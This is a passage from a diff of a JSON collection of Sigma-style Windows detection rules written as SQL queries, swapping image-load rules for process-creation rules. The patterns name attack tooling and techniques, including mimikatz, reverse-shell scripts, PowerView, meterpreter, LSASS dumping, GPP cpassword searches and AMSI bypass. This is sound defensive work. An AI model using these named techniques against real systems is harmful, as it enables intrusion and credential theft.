'%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE 
'\\'))" ], - "filename": "image_load_malware_3cx_compromise_susp_dll.yml" + "filename": "proc_creation_win_exploit_cve_2020_10189.yml" }, { - "title": "UAC Bypass Using Iscsicpl - ImageLoad", - "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "title": "HackTool - UACMe Akagi Execution", + "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", "status": "experimental", - "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", 
@@ -5808,977 +5642,973 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (NewProcessName LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" ], - "filename": 
"image_load_uac_bypass_iscsicpl.yml" + "filename": "proc_creation_win_hktl_uacme.yml" }, { - "title": "DotNet CLR DLL Loaded By Scripting Applications", - "id": "4508a70e-97ef-4300-b62b-ff27992990ea", - "status": "test", - "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", - "author": "omkar72, oscd.community", + "title": "Suspicious Rundll32 Without Any CommandLine Params", + "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "status": "experimental", + "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Unknown" + "Possible but rare" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" ], - "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_rundll32_no_params.yml" }, { - "title": "Potential Wazuh 
Security Platform DLL Sideloading", - "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", - "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of the Wazuh security platform", - "author": "X__Junior", + "title": "Potential Emotet Rundll32 Execution", + "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "status": "test", + "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", + "author": "FPT.EagleEye", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\ossec-agent\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Inkscape\\\\bin\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Pidgin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_wazuh.yml" + "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" }, { - "title": "APT PRIVATELOG Image Load Pattern", - "id": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", + "title": "Findstr GPP Passwords", + "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", "status": 
"test", - "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", - "author": "Florian Roth (Nextron Systems)", + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Rarely observed" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\clfsw32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" ], - "filename": "image_load_usp_svchost_clfsw32.yml" + "filename": "proc_creation_win_findstr_gpp_passwords.yml" }, { - "title": "Abusing Azure Browser SSO", - "id": "50f852e6-af22-4c78-9ede-42ef36aa3453", + "title": "Suspicious Spool Service Child Process", + "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", "status": "test", - "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", - "author": "Den Iuzvyk", + "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", + "author": "Justin C. 
(@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", "tags": [ - "attack.defense_evasion", + "attack.execution", + "attack.t1203", "attack.privilege_escalation", - "attack.t1574.002" + "attack.t1068" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%MicrosoftAccountTokenProvider.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\BackgroundTaskHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\OneDrive.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName = ''))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((NewProcessName LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\write.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" ], - "filename": "image_load_abusing_azure_browser_sso.yml" + "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" }, { - "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", - "id": "75e508f7-932d-4ebc-af77-269237a84ce1", + "title": "Schtasks Creation Or Modification With SYSTEM Privileges", + "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", "status": "experimental", - "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.003" + 
"attack.execution", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Unikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" ], - "filename": "image_load_cmstp_load_dll_from_susp_location.yml" + "filename": "proc_creation_win_schtasks_system.yml" }, { - "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", - "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", + "title": "Potential Credential Dumping Via WER", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "status": "experimental", - "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting 
msdt.exe binary to load the \"sdiageng.dll\" library", - "author": "Greg (rule)", + "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", + "author": "@pbssubhash , Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1202", - "cve.2022.30190" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" ], - "filename": "image_load_dll_sdiageng_load_by_msdt.yml" + "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" }, { - "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", - "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", - "status": "experimental", - "description": "Detects DLL sideloading of system dlls that are not present on the system by default. 
Usually to achieve techniques such as UAC bypass and privilege escalation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Logon Scripts (UserInitMprLogonScript)", + "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "status": "test", + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1037.001", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\proquota.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" ], - "filename": "image_load_side_load_non_existent_dlls.yml" + "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" }, { - "title": "Potential Rcdll.DLL Sideloading", - 
"id": "6e78b74f-c762-4800-82ad-f66787f10c8a", - "status": "experimental", - "description": "Detects potential DLL sideloading of rcdll.dll", - "author": "X__Junior", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], + "title": "Suspicious Program Names", + "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "status": "test", + "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate tools that accidentally match on the searched patterns" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\CVE-202%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CVE202%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\poc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfuscated.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfusc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE 
'%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_rcdll.yml" + "filename": "proc_creation_win_susp_progname.yml" }, { - "title": "Potential Iviewers.DLL Sideloading", - "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", - "status": "experimental", - "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", - "author": "X__Junior", + "title": "Renamed ZOHO Dctask64 Execution", + "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "status": "test", + "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1055.001", + "attack.t1202", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Unknown yet" ], "level": 
"high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" ], - "filename": "image_load_side_load_iviewers.yml" + "filename": "proc_creation_win_renamed_dctask64.yml" }, { - "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", - "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "title": "Xwizard DLL Sideloading", + "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Windows installed on non-C drive" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" + "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" }, { - "title": "DotNET DLL Loaded Via Office Applications", - "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", + "title": "Potential AMSI Bypass Via .NET Reflection", + "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", "status": "test", - "description": "Detects any assembly DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", + "author": "Markus Neis, @Kostastsale", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + 